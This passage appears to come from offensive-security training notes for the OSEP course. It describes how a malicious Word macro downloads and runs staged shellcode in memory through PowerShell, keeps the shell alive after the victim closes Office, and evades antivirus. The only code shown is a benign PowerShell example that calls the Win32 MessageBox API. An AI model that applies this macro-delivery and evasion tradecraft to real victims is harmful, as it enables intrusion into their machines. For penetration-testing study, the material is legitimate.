also we have a working exploit there is a room for improvement
the word-file contains the first stage shellcode saved on the hard drive which may be detected by the antivirus
the VBA version executes the shellcode directly from word memory which will close our shell if the victim closed office
we will change tactics a little bit
we will instruct the macro to download a PowerShell script which contain the staggering shellcode and run it in memory
we will lunch this script as a child process from word which will make our a shellcode alive even when the victim closes office
PowerShell can’t directly interact with win32 APIs but with the dotnet framework we can use C# in our code to call the APIs using the DLLImport attribute which will invoke functions from dynamic link libraries
$User32 = @"
using System;
using System.Runtime.InteropServices;
public class User32
{
[DllImport("user32.dll",CharSet=CharSet.Auto)]
public static extern int MessageBox(IntPtr hWnd,String Text,String Caption,int Options);
}
"@
Add-Type $User32
[User32]::MessageBox(0,"Rem01x Is Here","OSEP",0)
now look at this code and let’s analyze it
first we created a variable called User32 and added this class to it which is importing the user32.dll and then retrieving the MessageBox API to be called
then we added this new datatype of the variable to PowerShell and then we normally called the MessageBox API